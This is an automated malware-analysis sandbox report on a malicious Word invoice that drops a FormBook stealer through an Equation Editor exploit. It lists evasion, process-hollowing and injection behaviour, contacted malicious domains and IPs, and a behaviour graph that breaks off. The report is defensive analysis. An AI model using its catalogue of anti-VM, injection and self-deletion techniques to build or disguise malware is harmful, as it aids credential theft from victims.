Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$oforma invoice.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD24B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/8@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wininit.pdb source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: ibefrankhq4862.exe, wininit.exe

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/MainForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0040E3CE push esi; iretd 5_2_0040E3D6
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00417C03 push edi; iretd 5_2_00417C19
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0040E419 push ds; ret 5_2_0040E41C
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041D4F2 push eax; ret 5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041D4FB push eax; ret 5_2_0041D562
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00417C80 push edi; iretd 5_2_00417C19
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041D4A5 push eax; ret 5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0041D55C push eax; ret 5_2_0041D562
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024ADFA1 push ecx; ret 7_2_024ADFB4
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000EE3CE push esi; iretd 7_2_000EE3D6
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000EE419 push ds; ret 7_2_000EE41C
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FD4A5 push eax; ret 7_2_000FD4F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FD4FB push eax; ret 7_2_000FD562
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FD4F2 push eax; ret 7_2_000FD4F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FD55C push eax; ret 7_2_000FD562
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FD7C1 pushfd ; iretd 7_2_000FD7C2
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F7C03 push edi; iretd 7_2_000F7C19
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000F7C80 push edi; iretd 7_2_000F7C19
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_000FDD5E push eax; ret 7_2_000FDD60
Source: initial sample Static PE information: section name: .text entropy: 7.04325438005
Source: initial sample Static PE information: section name: .text entropy: 7.04325438005

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 4.2.ibefrankhq4862.exe.28bed1c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ibefrankhq4862.exe PID: 2032, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E9904 second address: 00000000000E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe RDTSC instruction interceptor: First address: 00000000000E9B6E second address: 00000000000E9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2632 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2752 Thread sleep time: -37527s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2692 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2852 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe TID: 2184 Thread sleep time: -44000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\wininit.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wininit.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Thread delayed: delay time: 37527 Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.418716458.000000000456F000.00000004.00000001.sdmp Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.437383575.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.413102418.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_008726F8 mov eax, dword ptr fs:[00000030h] 5_2_008726F8
Source: C:\Windows\SysWOW64\wininit.exe Code function: 7_2_024B26F8 mov eax, dword ptr fs:[00000030h] 7_2_024B26F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Code function: 5_2_0040ACE0 LdrLoadDll, 5_2_0040ACE0
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.urbantennis.info
Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lazyguysmarketing.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 5B0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Memory written: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Queries volume information: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491373 Sample: Proforma invoice.doc Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 37 www.visionandcourage.com 2->37 39 td-balancer-euw2-6-109.wixdns.net 2->39 41 3 other IPs or domains 2->41 57 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 15 other signatures 2->63 11 EQNEDT32.EXE 11 2->11         started        16 WINWORD.EXE 291 23 2->16         started        signatures3 process4 dnsIp5 49 fantecheo.tk 185.239.243.112, 49165, 80 CLOUDIE-AS-APCloudieLimitedHK Moldova Republic of 11->49 33 C:\Users\user\AppData\...\ibefrankhq4862.exe, PE32 11->33 dropped 35 C:\Users\user\AppData\...\ibefrankzx[1].exe, PE32 11->35 dropped 81 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->81 18 ibefrankhq4862.exe 1 5 11->18         started        file6 signatures7 process8 signatures9 51 Multi AV Scanner detection for dropped file 18->51 53 Tries to detect virtualization through RDTSC time measurements 18->53 55 Injects a PE file into a foreign processes 18->55 21 ibefrankhq4862.exe 18->21         started        process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 21->65 67 Maps a DLL or memory area into another process 21->67 69 Sample uses process hollowing technique 21->69 71 Queues an APC in another process (thread injection) 21->71 24 explorer.exe 21->24 injected process12 dnsIp13 43 www.urbantennis.info 24->43 45 